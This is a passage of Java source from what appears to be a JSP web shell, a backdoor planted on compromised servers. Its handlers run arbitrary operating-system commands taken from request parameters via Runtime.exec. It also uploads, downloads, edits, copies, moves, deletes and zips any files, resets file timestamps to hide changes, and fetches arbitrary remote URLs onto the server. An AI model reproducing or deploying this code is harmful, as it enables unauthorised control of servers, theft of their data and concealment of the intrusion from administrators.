1873. + "'}).pack()\">Pack</a>");
1874. }
1875. }
1876. out.println("</td></tr>");
1877. }
1878. }
1879. out
1880. .println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"
1881. + " <td>");
1882. if (enter != null)
1883. out
1884. .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');\">Pack Selected</a> - <a href=\"javascript:alert('You Are In File Now ! Can Not Delete !');\">Delete Selected</a>");
1885. else
1886. out
1887. .println("<a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a>");
1888. out.println("</td>" + " <td colspan=\"4\" align=\"right\">"
1889. + dircount + " directories / " + filecount
1890. + " files</td></tr>" + "</table>");
1891. out.println("</div>");
1892. if (file instanceof EnterFile)
1893. ((EnterFile) file).close();
1894. } catch (ZipException e) {
1895. JSession.setAttribute(MSG, "\""
1896. + JSession.getAttribute(ENTER).toString()
1897. + "\" Is Not a Zip File. Please Exit.");
1898. throw e;
1899. } catch (Exception e) {
1900. JSession.setAttribute(MSG,
1901. "File Does Not Exist Or You Dont Have Privilege."
1902. + BACK_HREF);
1903. throw e;
1904. }
1905. }
1906. }
1907.  
1908. private static class LogoutInvoker extends DefaultInvoker {
1909. public boolean doBefore() {
1910. return false;
1911. }
1912.  
1913. public boolean doAfter() {
1914. return false;
1915. }
1916.  
1917. public void invoke(HttpServletRequest request,
1918. HttpServletResponse response, HttpSession JSession)
1919. throws Exception {
1920. try {
1921. Object dbo = JSession.getAttribute(DBO);
1922. if (dbo != null)
1923. ((DBOperator) dbo).close();
1924. Object obj = JSession.getAttribute(PORT_MAP);
1925. if (obj != null) {
1926. ServerSocket s = (ServerSocket) obj;
1927. s.close();
1928. }
1929. Object online = JSession.getAttribute(SHELL_ONLINE);
1930. if (online != null)
1931. ((OnLineProcess) online).stop();
1932. JSession.invalidate();
1933. ((Invoker) ins.get("vLogin")).invoke(request, response,
1934. JSession);
1935. } catch (ClassCastException e) {
1936. JSession.invalidate();
1937. ((Invoker) ins.get("vLogin")).invoke(request, response,
1938. JSession);
1939. } catch (Exception e) {
1940.  
1941. throw e;
1942. }
1943. }
1944. }
1945.  
1946. private static class UploadInvoker extends DefaultInvoker {
1947. public boolean doBefore() {
1948. return false;
1949. }
1950.  
1951. public boolean doAfter() {
1952. return false;
1953. }
1954.  
1955. public void invoke(HttpServletRequest request,
1956. HttpServletResponse response, HttpSession JSession)
1957. throws Exception {
1958. try {
1959. UploadBean fileBean = new UploadBean();
1960. response.getWriter().println(
1961. JSession.getAttribute(CURRENT_DIR).toString());
1962. fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR)
1963. .toString());
1964. fileBean.parseRequest(request);
1965. File f = new File(JSession.getAttribute(CURRENT_DIR) + "/"
1966. + fileBean.getFileName());
1967. if (f.exists() && f.length() > 0)
1968. JSession
1969. .setAttribute(MSG,
1970. "<span style='color:green'>Upload File Success!</span>");
1971. else
1972. JSession
1973. .setAttribute("MSG",
1974. "<span style='color:red'>Upload File Failed!</span>");
1975. response.sendRedirect(SHELL_NAME);
1976. } catch (Exception e) {
1977. throw e;
1978. }
1979. }
1980. }
1981.  
1982. private static class CopyInvoker extends DefaultInvoker {
1983. public void invoke(HttpServletRequest request,
1984. HttpServletResponse response, HttpSession JSession)
1985. throws Exception {
1986. try {
1987. String src = request.getParameter("src");
1988. String to = request.getParameter("to");
1989. InputStream in = null;
1990. Object enter = JSession.getAttribute(ENTER);
1991. if (enter == null)
1992. in = new FileInputStream(new File(src));
1993. else {
1994. ZipFile zf = new ZipFile((String) enter);
1995. ZipEntry entry = zf.getEntry(src);
1996. in = zf.getInputStream(entry);
1997. }
1998. BufferedInputStream input = new BufferedInputStream(in);
1999. BufferedOutputStream output = new BufferedOutputStream(
2000. new FileOutputStream(new File(to)));
2001. byte[] d = new byte[1024];
2002. int len = input.read(d);
2003. while (len != -1) {
2004. output.write(d, 0, len);
2005. len = input.read(d);
2006. }
2007. output.close();
2008. input.close();
2009. JSession.setAttribute(MSG, "Copy File Success!");
2010. response.sendRedirect(SHELL_NAME);
2011. } catch (Exception e) {
2012.  
2013. throw e;
2014. }
2015. }
2016. }
2017.  
2018. private static class BottomInvoker extends DefaultInvoker {
2019. public boolean doBefore() {
2020. return false;
2021. }
2022.  
2023. public boolean doAfter() {
2024. return false;
2025. }
2026.  
2027. public void invoke(HttpServletRequest request,
2028. HttpServletResponse response, HttpSession JSession)
2029. throws Exception {
2030. try {
2031. response
2032. .getWriter()
2033. .println(
2034. "<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Don't break my heart~"
2035. + "</div>");
2036. } catch (Exception e) {
2037.  
2038. throw e;
2039. }
2040. }
2041. }
2042.  
2043. private static class VCreateFileInvoker extends DefaultInvoker {
2044. public void invoke(HttpServletRequest request,
2045. HttpServletResponse response, HttpSession JSession)
2046. throws Exception {
2047. try {
2048. PrintWriter out = response.getWriter();
2049. String path = request.getParameter("filepath");
2050. File f = new File(path);
2051. if (!f.isAbsolute()) {
2052. String oldPath = path;
2053. path = JSession.getAttribute(CURRENT_DIR).toString();
2054. if (!path.endsWith("/"))
2055. path += "/";
2056. path += oldPath;
2057. f = new File(path);
2058. f.createNewFile();
2059. } else {
2060. f.createNewFile();
2061. }
2062. out
2063. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2064. + "<form name=\"form1\" id=\"form1\" action=\""
2065. + SHELL_NAME
2066. + "\" method=\"post\" >"
2067. + "<h2>Create / Edit File &raquo;</h2>"
2068. + "<input type='hidden' name='o' value='createFile'>"
2069. + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""
2070. + path
2071. + "\" type=\"text\" size=\"100\" />"
2072. + " <select name='charset' class='input'><option value='ANSI'>ANSI</option><option value='UTF-8'>UTF-8</option></select></p>"
2073. + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"
2074. + "<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"
2075. + "</form>" + "</td></tr></table>");
2076. } catch (Exception e) {
2077.  
2078. throw e;
2079. }
2080. }
2081. }
2082.  
2083. private static class VEditInvoker extends DefaultInvoker {
2084. public void invoke(HttpServletRequest request,
2085. HttpServletResponse response, HttpSession JSession)
2086. throws Exception {
2087. try {
2088. PrintWriter out = response.getWriter();
2089. String path = request.getParameter("filepath");
2090. String charset = request.getParameter("charset");
2091. Object enter = JSession.getAttribute(ENTER);
2092. InputStream input = null;
2093. if (enter != null) {
2094. ZipFile zf = new ZipFile((String) enter);
2095. ZipEntry entry = new ZipEntry(path);
2096. input = zf.getInputStream(entry);
2097. } else {
2098. File f = new File(path);
2099. if (!f.exists())
2100. return;
2101. input = new FileInputStream(path);
2102. }
2103.  
2104. BufferedReader reader = null;
2105. if (Util.isEmpty(charset) || charset.equals("ANSI"))
2106. reader = new BufferedReader(new InputStreamReader(input));
2107. else
2108. reader = new BufferedReader(new InputStreamReader(input,
2109. charset));
2110. StringBuffer content = new StringBuffer();
2111. String s = reader.readLine();
2112. while (s != null) {
2113. content.append(s + "\r\n");
2114. s = reader.readLine();
2115. }
2116. reader.close();
2117. out
2118. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2119. + "<form name=\"form1\" id=\"form1\" action=\""
2120. + SHELL_NAME
2121. + "\" method=\"post\" >"
2122. + "<h2>Create / Edit File &raquo;</h2>"
2123. + "<input type='hidden' name='o' value='createFile'>"
2124. + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""
2125. + path
2126. + "\" type=\"text\" size=\"100\" />"
2127. + " <select name='charset' id='fcharset' onchange=\"new fso({path:'"
2128. + path
2129. + "',charset:document.getElementById('fcharset').value}).vEdit()\" class='input'><option value='ANSI'>ANSI</option><option "
2130. + ((!Util.isEmpty(charset) && charset
2131. .equals("UTF-8")) ? "selected" : "")
2132. + " value='UTF-8'>UTF-8</option></select></p>"
2133. + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"
2134. + Util.htmlEncode(content.toString())
2135. + "</textarea></p>" + "<p>");
2136. if (enter != null)
2137. out
2138. .println("<input class=\"bt\" name=\"submit\" id=\"submit\" onclick=\"alert('You Are In File Now ! Can Not Save !')\" type=\"button\" value=\"Submit\">");
2139. else
2140. out
2141. .println("<input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\">");
2142. out
2143. .println("<input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"
2144. + "</form>" + "</td></tr></table>");
2145.  
2146. } catch (Exception e) {
2147.  
2148. throw e;
2149. }
2150. }
2151. }
2152.  
2153. private static class CreateFileInvoker extends DefaultInvoker {
2154. public boolean doBefore() {
2155. return false;
2156. }
2157.  
2158. public boolean doAfter() {
2159. return false;
2160. }
2161.  
2162. public void invoke(HttpServletRequest request,
2163. HttpServletResponse response, HttpSession JSession)
2164. throws Exception {
2165. try {
2166. PrintWriter out = response.getWriter();
2167. String path = request.getParameter("filepath");
2168. String content = request.getParameter("filecontent");
2169. String charset = request.getParameter("charset");
2170. BufferedWriter outs = null;
2171. if (charset.equals("ANSI"))
2172. outs = new BufferedWriter(new FileWriter(new File(path)));
2173. else
2174. outs = new BufferedWriter(new OutputStreamWriter(
2175. new FileOutputStream(new File(path)), charset));
2176. outs.write(content, 0, content.length());
2177. outs.close();
2178. JSession
2179. .setAttribute(
2180. MSG,
2181. "Save File <span style='color:green'>"
2182. + (new File(path)).getName()
2183. + "</span> With <span style='font-weight:bold;color:red'>"
2184. + charset + "</span> Success!");
2185. response.sendRedirect(SHELL_NAME);
2186. } catch (Exception e) {
2187.  
2188. throw e;
2189. }
2190. }
2191. }
2192.  
2193.  
2194.  
2195. private static class VEditPropertyInvoker extends DefaultInvoker {
2196. public void invoke(HttpServletRequest request,
2197. HttpServletResponse response, HttpSession JSession)
2198. throws Exception {
2199. try {
2200. PrintWriter out = response.getWriter();
2201. String filepath = request.getParameter("filepath");
2202. File f = new File(filepath);
2203. if (!f.exists())
2204. return;
2205. String read = f.canRead() ? "checked=\"checked\"" : "";
2206. String write = f.canWrite() ? "checked=\"checked\"" : "";
2207. Calendar cal = Calendar.getInstance();
2208. cal.setTimeInMillis(f.lastModified());
2209.  
2210. out
2211. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2212. + "<form name=\"form1\" id=\"form1\" action=\""
2213. + SHELL_NAME
2214. + "\" method=\"post\" >"
2215. + "<h2>Set File Property &raquo;</h2>"
2216. + "<p>Current File (FullPath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""
2217. + request.getParameter("filepath")
2218. + "\" type=\"text\" size=\"120\" /></p>"
2219. + "<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "
2220. + "<p>"
2221. + " <input type=\"checkbox\" disabled "
2222. + read
2223. + " name=\"read\" id=\"checkbox\">Read "
2224. + " <input type=\"checkbox\" disabled "
2225. + write
2226. + " name=\"write\" id=\"checkbox2\">Write "
2227. + "</p>"
2228. + "<p>Instead &raquo;"
2229. + "year:"
2230. + "<input class=\"input\" name=\"year\" value="
2231. + cal.get(Calendar.YEAR)
2232. + " id=\"year\" type=\"text\" size=\"4\" />"
2233. + "month:"
2234. + "<input class=\"input\" name=\"month\" value="
2235. + (cal.get(Calendar.MONTH) + 1)
2236. + " id=\"month\" type=\"text\" size=\"2\" />"
2237. + "day:"
2238. + "<input class=\"input\" name=\"date\" value="
2239. + cal.get(Calendar.DATE)
2240. + " id=\"date\" type=\"text\" size=\"2\" />"
2241. + ""
2242. + "hour:"
2243. + "<input class=\"input\" name=\"hour\" value="
2244. + cal.get(Calendar.HOUR)
2245. + " id=\"hour\" type=\"text\" size=\"2\" />"
2246. + "minute:"
2247. + "<input class=\"input\" name=\"minute\" value="
2248. + cal.get(Calendar.MINUTE)
2249. + " id=\"minute\" type=\"text\" size=\"2\" />"
2250. + "second:"
2251. + "<input class=\"input\" name=\"second\" value="
2252. + cal.get(Calendar.SECOND)
2253. + " id=\"second\" type=\"text\" size=\"2\" />"
2254. + "</p>"
2255. + "<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"
2256. + "</form>" + "</td></tr></table>");
2257. } catch (Exception e) {
2258. throw e;
2259. }
2260. }
2261. }
2262.  
2263. private static class EditPropertyInvoker extends DefaultInvoker {
2264. public boolean doBefore() {
2265. return false;
2266. }
2267.  
2268. public boolean doAfter() {
2269. return false;
2270. }
2271.  
2272. public void invoke(HttpServletRequest request,
2273. HttpServletResponse response, HttpSession JSession)
2274. throws Exception {
2275. try {
2276. String f = request.getParameter("file");
2277. File file = new File(f);
2278. if (!file.exists())
2279. return;
2280.  
2281. String year = request.getParameter("year");
2282. String month = request.getParameter("month");
2283. String date = request.getParameter("date");
2284. String hour = request.getParameter("hour");
2285. String minute = request.getParameter("minute");
2286. String second = request.getParameter("second");
2287.  
2288. Calendar cal = Calendar.getInstance();
2289. cal.set(Calendar.YEAR, Integer.parseInt(year));
2290. cal.set(Calendar.MONTH, Integer.parseInt(month) - 1);
2291. cal.set(Calendar.DATE, Integer.parseInt(date));
2292. cal.set(Calendar.HOUR, Integer.parseInt(hour));
2293. cal.set(Calendar.MINUTE, Integer.parseInt(minute));
2294. cal.set(Calendar.SECOND, Integer.parseInt(second));
2295. if (file.setLastModified(cal.getTimeInMillis())) {
2296. JSession.setAttribute(MSG, "Reset File Property Success!");
2297. } else {
2298. JSession
2299. .setAttribute(MSG,
2300. "<span style='color:red'>Reset File Property Failed!</span>");
2301. }
2302. response.sendRedirect(SHELL_NAME);
2303. } catch (Exception e) {
2304.  
2305. throw e;
2306. }
2307. }
2308. }
2309.  
2310. //VShell
2311. private static class VsInvoker extends DefaultInvoker {
2312. public void invoke(HttpServletRequest request,
2313. HttpServletResponse response, HttpSession JSession)
2314. throws Exception {
2315. try {
2316. PrintWriter out = response.getWriter();
2317. String cmd = request.getParameter("command");
2318. String program = request.getParameter("program");
2319. if (cmd == null) {
2320. if (ISLINUX)
2321. cmd = "id";
2322. else
2323. cmd = "cmd.exe /c set";
2324. }
2325. if (program == null)
2326. program = "cmd.exe /c net start > " + SHELL_DIR
2327. + "/Log.txt";
2328. if (JSession.getAttribute(MSG) != null) {
2329. Util.outMsg(out, JSession.getAttribute(MSG).toString());
2330. JSession.removeAttribute(MSG);
2331. }
2332. out
2333. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2334. + "<form name=\"form1\" id=\"form1\" action=\""
2335. + SHELL_NAME
2336. + "\" method=\"post\" >"
2337. + "<h2>Execute Program &raquo;</h2>"
2338. + "<p>"
2339. + "<input type=\"hidden\" name=\"o\" value=\"shell\">"
2340. + "<input type=\"hidden\" name=\"type\" value=\"program\">"
2341. + "Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""
2342. + program
2343. + "\" type=\"text\" size=\"100\" />"
2344. + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"
2345. + "</p>"
2346. + "</form>"
2347. + "<form name=\"form1\" id=\"form1\" action=\""
2348. + SHELL_NAME
2349. + "\" method=\"post\" >"
2350. + "<h2>Execute Shell &raquo;</h2>"
2351. + "<p>"
2352. + "<input type=\"hidden\" name=\"o\" value=\"shell\">"
2353. + "<input type=\"hidden\" name=\"type\" value=\"command\">"
2354. + "Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""
2355. + cmd
2356. + "\" type=\"text\" size=\"100\" />"
2357. + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"
2358. + "</p>"
2359. + "</form>"
2360. + "</td>"
2361. + "</tr></table>");
2362. } catch (Exception e) {
2363.  
2364. throw e;
2365. }
2366. }
2367. }
2368.  
2369. private static class ShellInvoker extends DefaultInvoker {
2370. public void invoke(HttpServletRequest request,
2371. HttpServletResponse response, HttpSession JSession)
2372. throws Exception {
2373. try {
2374. PrintWriter out = response.getWriter();
2375. String type = request.getParameter("type");
2376. if (type.equals("command")) {
2377. ((Invoker) ins.get("vs")).invoke(request, response,
2378. JSession);
2379. out.println("<div style='margin:10px'><hr/>");
2380. out.println("<pre>");
2381. String command = request.getParameter("command");
2382. if (!Util.isEmpty(command)) {
2383. Process pro = Runtime.getRuntime().exec(command);
2384. BufferedReader reader = new BufferedReader(
2385. new InputStreamReader(pro.getInputStream()));
2386. String s = reader.readLine();
2387. while (s != null) {
2388. out.println(Util.htmlEncode(Util.getStr(s)));
2389. s = reader.readLine();
2390. }
2391. reader.close();
2392. reader = new BufferedReader(new InputStreamReader(pro
2393. .getErrorStream()));
2394. s = reader.readLine();
2395. while (s != null) {
2396. out.println(Util.htmlEncode(Util.getStr(s)));
2397. s = reader.readLine();
2398. }
2399. reader.close();
2400. out.println("</pre></div>");
2401. }
2402. } else {
2403. String program = request.getParameter("program");
2404. if (!Util.isEmpty(program)) {
2405. Process pro = Runtime.getRuntime().exec(program);
2406. JSession.setAttribute(MSG, "Program Has Run Success!");
2407. ((Invoker) ins.get("vs")).invoke(request, response,
2408. JSession);
2409. }
2410. }
2411. } catch (Exception e) {
2412.  
2413. throw e;
2414. }
2415. }
2416. }
2417.  
2418. private static class DownInvoker extends DefaultInvoker {
2419. public boolean doBefore() {
2420. return false;
2421. }
2422.  
2423. public boolean doAfter() {
2424. return false;
2425. }
2426.  
2427. public void invoke(HttpServletRequest request,
2428. HttpServletResponse response, HttpSession JSession)
2429. throws Exception {
2430. try {
2431. String path = request.getParameter("path");
2432. if (Util.isEmpty(path))
2433. return;
2434. InputStream i = null;
2435. Object enter = JSession.getAttribute(ENTER);
2436. String fileName = null;
2437. if (enter == null) {
2438. File f = new File(path);
2439. if (!f.exists())
2440. return;
2441. fileName = f.getName();
2442. i = new FileInputStream(f);
2443. } else {
2444. ZipFile zf = new ZipFile((String) enter);
2445. ZipEntry entry = new ZipEntry(path);
2446. fileName = entry.getName().substring(
2447. entry.getName().lastIndexOf("/") + 1);
2448. i = zf.getInputStream(entry);
2449. }
2450. response.setHeader("Content-Disposition",
2451. "attachment;filename="
2452. + URLEncoder.encode(fileName, PAGE_CHARSET));
2453. BufferedInputStream input = new BufferedInputStream(i);
2454. BufferedOutputStream output = new BufferedOutputStream(response
2455. .getOutputStream());
2456. byte[] data = new byte[1024];
2457. int len = input.read(data);
2458. while (len != -1) {
2459. output.write(data, 0, len);
2460. len = input.read(data);
2461. }
2462. input.close();
2463. output.close();
2464. } catch (Exception e) {
2465.  
2466. throw e;
2467. }
2468. }
2469. }
2470.  
2471. //VDown
2472. private static class VdInvoker extends DefaultInvoker {
2473. public void invoke(HttpServletRequest request,
2474. HttpServletResponse response, HttpSession JSession)
2475. throws Exception {
2476. try {
2477. PrintWriter out = response.getWriter();
2478. String savepath = request.getParameter("savepath");
2479. String url = request.getParameter("url");
2480. if (Util.isEmpty(url))
2481. url = "http://www.baidu.com/";
2482. if (Util.isEmpty(savepath)) {
2483. savepath = JSession.getAttribute(CURRENT_DIR).toString();
2484. }
2485. if (!Util.isEmpty(JSession.getAttribute("done"))) {
2486. Util.outMsg(out, "Download Remote File Success!");
2487. JSession.removeAttribute("done");
2488. }
2489. out
2490. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
2491. + "<form name=\"form1\" id=\"form1\" action=\""
2492. + SHELL_NAME
2493. + "\" method=\"post\" >"
2494. + "<h2>Remote File DownLoad &raquo;</h2>"
2495. + "<p>"
2496. + "<input type=\"hidden\" name=\"o\" value=\"downRemote\">"
2497. + "<p>File&nbsp;&nbsp;&nbsp;URL: "
2498. + " <input class=\"input\" name=\"url\" value=\""
2499. + url
2500. + "\" id=\"url\" type=\"text\" size=\"200\" /></p>"
2501. + "<p>Save Path: "
2502. + "<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""
2503. + savepath
2504. + "\" type=\"text\" size=\"200\" /></p>"
2505. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\" />"
2506. + "</p>" + "</form></table>");
2507. } catch (Exception e) {
2508.  
2509. throw e;
2510. }
2511. }
2512. }
2513.  
2514. private static class DownRemoteInvoker extends DefaultInvoker {
2515. public boolean doBefore() {
2516. return true;
2517. }
2518.  
2519. public boolean doAfter() {
2520. return true;
2521. }
2522.  
2523. public void invoke(HttpServletRequest request,
2524. HttpServletResponse response, HttpSession JSession)
2525. throws Exception {
2526. try {
2527. String downFileUrl = request.getParameter("url");
2528. String savePath = request.getParameter("savepath");
2529. if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
2530. return;
2531. URL downUrl = new URL(downFileUrl);
2532. URLConnection conn = downUrl.openConnection();
2533.  
2534. File tempF = new File(savePath);
2535. File saveF = tempF;
2536. if (tempF.isDirectory()) {
2537. String fName = downFileUrl.substring(downFileUrl
2538. .lastIndexOf("/") + 1);
2539. saveF = new File(tempF, fName);
2540. }
2541. BufferedInputStream in = new BufferedInputStream(conn
2542. .getInputStream());
2543. BufferedOutputStream out = new BufferedOutputStream(
2544. new FileOutputStream(saveF));
2545. byte[] data = new byte[1024];
2546. int len = in.read(data);
2547. while (len != -1) {
2548. out.write(data, 0, len);
2549. len = in.read(data);
2550. }
2551. in.close();
2552. out.close();
2553. JSession.setAttribute("done", "d");
2554. ((Invoker) ins.get("vd")).invoke(request, response, JSession);
2555. } catch (Exception e) {
2556.  
2557. throw e;
2558. }
2559. }
2560. }
2561.  
2562. private static class IndexInvoker extends DefaultInvoker {
2563. public void invoke(HttpServletRequest request,
2564. HttpServletResponse response, HttpSession JSession)
2565. throws Exception {
2566. try {
2567. ((Invoker) ins.get("filelist")).invoke(request, response,
2568. JSession);
2569. } catch (Exception e) {
2570.  
2571. throw e;
2572. }
2573. }
2574. }
2575.  
2576. private static class MkDirInvoker extends DefaultInvoker {
2577. public boolean doBefore() {
2578. return false;
2579. }
2580.  
2581. public boolean doAfter() {
2582. return false;
2583. }
2584.  
2585. public void invoke(HttpServletRequest request,
2586. HttpServletResponse response, HttpSession JSession)
2587. throws Exception {
2588. try {
2589. String name = request.getParameter("name");
2590. File f = new File(name);
2591. if (!f.isAbsolute()) {
2592. String path = JSession.getAttribute(CURRENT_DIR).toString();
2593. if (!path.endsWith("/"))
2594. path += "/";
2595. path += name;
2596. f = new File(path);
2597. }
2598. f.mkdirs();
2599. JSession.setAttribute(MSG, "Make Directory Success!");
2600. response.sendRedirect(SHELL_NAME);
2601. } catch (Exception e) {
2602.  
2603. throw e;
2604. }
2605. }
2606. }
2607.  
2608. private static class MoveInvoker extends DefaultInvoker {
2609. public boolean doBefore() {
2610. return false;
2611. }
2612.  
2613. public boolean doAfter() {
2614. return false;
2615. }
2616.  
2617. public void invoke(HttpServletRequest request,
2618. HttpServletResponse response, HttpSession JSession)
2619. throws Exception {
2620. try {
2621. PrintWriter out = response.getWriter();
2622. String src = request.getParameter("src");
2623. String target = request.getParameter("to");
2624. if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
2625. File file = new File(src);
2626. if (file.renameTo(new File(target))) {
2627. JSession.setAttribute(MSG, "Move File Success!");
2628. } else {
2629. String msg = "Move File Failed!";
2630. if (file.isDirectory()) {
2631. msg += "The Move Will Failed When The Directory Is Not Empty.";
2632. }
2633. JSession.setAttribute(MSG, msg);
2634. }
2635. response.sendRedirect(SHELL_NAME);
2636. }
2637. } catch (Exception e) {
2638.  
2639. throw e;
2640. }
2641. }
2642. }
2643.  
2644. private static class RemoveDirInvoker extends DefaultInvoker {
2645. public boolean doBefore() {
2646. return false;
2647. }
2648.  
2649. public boolean doAfter() {
2650. return false;
2651. }
2652.  
2653. public void invoke(HttpServletRequest request,
2654. HttpServletResponse response, HttpSession JSession)
2655. throws Exception {
2656. try {
2657. String dir = request.getParameter("dir");
2658. File file = new File(dir);
2659. if (file.exists()) {
2660. deleteFile(file);
2661. deleteDir(file);
2662. }
2663.  
2664. JSession.setAttribute(MSG, "Remove Directory Success!");
2665. response.sendRedirect(SHELL_NAME);
2666. } catch (Exception e) {
2667.  
2668. throw e;
2669. }
2670. }
2671.  
2672. public void deleteFile(File f) {
2673. if (f.isFile()) {
2674. f.delete();
2675. } else {
2676. File[] list = f.listFiles();
2677. for (int i = 0; i < list.length; i++) {
2678. File ff = list[i];
2679. deleteFile(ff);
2680. }
2681. }
2682. }
2683.  
2684. public void deleteDir(File f) {
2685. File[] list = f.listFiles();
2686. if (list.length == 0) {
2687. f.delete();
2688. } else {
2689. for (int i = 0; i < list.length; i++) {
2690. File ff = list[i];
2691. deleteDir(ff);
2692. }
2693. deleteDir(f);
2694. }
2695. }
2696. }
2697.  
2698. private static class PackBatchInvoker extends DefaultInvoker {
2699. public boolean doBefore() {
2700. return false;
2701. }
2702.  
2703. public boolean doAfter() {
2704. return false;
2705. }
2706.  
2707. public void invoke(HttpServletRequest request,
2708. HttpServletResponse response, HttpSession JSession)
2709. throws Exception {
2710. try {
2711. String files = request.getParameter("files");
2712. if (Util.isEmpty(files))
2713. return;
2714. String saveFileName = request.getParameter("savefilename");
2715. File saveF = new File(JSession.getAttribute(CURRENT_DIR)
2716. .toString(), saveFileName);
2717. if (saveF.exists()) {
2718. JSession.setAttribute(MSG, "The File \"" + saveFileName
2719. + "\" Has Been Exists!");
2720. response.sendRedirect(SHELL_NAME);
2721. return;
2722. }
2723. ZipOutputStream zout = new ZipOutputStream(
2724. new BufferedOutputStream(new FileOutputStream(saveF)));
2725. String[] arr = files.split(",");
2726. for (int i = 0; i < arr.length; i++) {
2727. String f = arr[i];
2728. File pF = new File(JSession.getAttribute(CURRENT_DIR)
2729. .toString(), f);
2730. ZipEntry entry = new ZipEntry(pF.getName());
2731. zout.putNextEntry(entry);
2732. FileInputStream fInput = new FileInputStream(pF);
2733. int len = 0;
2734. byte[] buf = new byte[1024];
2735. while ((len = fInput.read(buf)) != -1) {
2736. zout.write(buf, 0, len);
2737. zout.flush();
2738. }
2739. fInput.close();
2740. }
2741. zout.close();
2742. JSession.setAttribute(MSG, "Pack Files Success!");
2743. response.sendRedirect(SHELL_NAME);
2744. } catch (Exception e) {
2745.  
2746. throw e;
2747. }
2748. }
2749. }
2750.  
2751. private static class VPackConfigInvoker extends DefaultInvoker {
2752. public void invoke(HttpServletRequest request,
2753. HttpServletResponse response, HttpSession JSession)
2754. throws Exception {
2755. try {
2756. PrintWriter out = response.getWriter();
2757. String packfile = request.getParameter("packedfile");
2758. String currentd = JSession.getAttribute(CURRENT_DIR).toString();
2759. out
2760. .println("<form action='"
2761. + SHELL_NAME
2762. + "' method='post'>"
2763. + "<input type='hidden' name='o' value='pack'/>"
2764. + "<input type='hidden' name='config' value='true'/>"
2765. + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
2766. + " <tr>"
2767. + " <td><h2 id=\"Bin_H2_Title\">Pack Configuration &gt;&gt;<hr/></h2>"
2768. + " <div id=\"hOWTm\">"
2769. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
2770. + " <tr align=\"center\">"
2771. + " <td style=\"width:5%\"></td>"
2772. + " <td align=\"center\"><table border=\"0\">"
2773. + " <tr>"
2774. + " <td>Packed Dir</td>"
2775. + " <td><input type=\"text\" name=\"packedfile\" size='100' value=\""
2776. + packfile
2777. + "\" class=\"input\"/></td>"
2778. + " </tr>"
2779. + " <tr>"
2780. + " <td>Save To</td>"
2781. + " <td><input type=\"text\" name=\"savefilename\" size='100' value=\""
2782. + ((currentd.endsWith("/") ? currentd
2783. : currentd + "/") + "pack.zip")
2784. + "\" class=\"input\"/></td>"
2785. + " </tr>"
2786. + " <tr>"
2787. + " <td colspan=\"2\"><fieldset><legend>Ext Filter</legend>"
2788. + " <input type='radio' name='extfilter' value='no'/>no <input checked type='radio' name='extfilter' value='blacklist'/>Blacklist <input type='radio' name='extfilter' value='whitelist'/>Whitelist"
2789. + " <hr/><input type='text' class='input' size='100' value='mp3,wmv,rm,rmvb,avi' name='fileext'/>"
2790. + " </fieldset></td>"
2791. + " </tr>"
2792. + " <tr>"
2793. + " <td>Filesize Filter</td>"
2794. + " <td><input type=\"text\" name=\"filesize\" value=\"0\" class=\"input\"/>(KB) "
2795. + " <input type='radio' name='sizefilter' value='no' checked>no <input type='radio' name='sizefilter' value='greaterthan'>greaterthan<input type='radio' name='sizefilter' value='lessthan'>lessthan</td>"
2796. + " </tr>"
2797. + " <tr>"
2798. + " <td>Exclude Dir</td>"
2799. + " <td><input type=\"text\" name=\"exclude\" size='100' class=\"input\"/></td>"
2800. + " </tr>"
2801. + " </table></td>"
2802. + " </tr>"
2803. + " <tr align=\"center\">"
2804. + " <td colspan=\"2\">"
2805. + " <input type=\"submit\" name=\"FJE\" value=\"Pack\" id=\"FJE\" class=\"bt\" />"
2806. + " </td>" + " </tr>"
2807. + " </table>" + " </div></td>"
2808. + " </tr>" + " </table></form>");
2809. } catch (Exception e) {
2810.  
2811. throw e;
2812. }
2813. }
2814. }
2815.  
2816. private static class PackInvoker extends DefaultInvoker {
